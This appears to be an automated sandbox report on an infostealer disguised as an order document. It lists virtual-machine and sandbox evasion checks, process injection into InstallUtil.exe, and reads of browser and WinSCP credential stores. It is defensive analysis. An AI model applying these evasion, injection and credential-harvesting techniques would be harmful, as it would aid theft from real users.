                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7416, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fqhnalw.exe PID: 7784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fqhnalw.exe PID: 7972, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003252000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.0000000003042000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory allocated: 3200000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory allocated: 5200000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 12D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2DB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4DB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory allocated: 1310000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory allocated: 2EB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 15F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 33B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory allocated: 15C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory allocated: 2FF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory allocated: 2DF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 14C0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 31B0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 51B0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: Fqhnalw.exe, 00000006.00000002.1653047795.0000000003042000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: InstallUtil.exe, 00000002.00000002.1576744494.0000000005963000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1669394539.0000000006590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
                    Source: Fqhnalw.exe, 00000006.00000002.1653047795.0000000003042000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1388363679.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1561377900.0000000001362000.00000004.00000020.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1646663653.0000000001256000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2595206686.0000000006470000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C42008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 10B4008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1016008Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeQueries volume information: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeQueries volume information: C:\Users\user\AppData\Roaming\Fqhnalw.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeQueries volume information: C:\Users\user\AppData\Roaming\Fqhnalw.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2583924445.00000000031E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1677808724.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1655327124.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1566745789.0000000003125000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1561474335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1570412470.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1399224699.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1653047795.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1585499252.000000000417C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2583924445.00000000031FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1655327124.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1570412470.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1389741733.0000000003483000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7416, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fqhnalw.exe PID: 7784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7872, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fqhnalw.exe PID: 7972, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8048, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
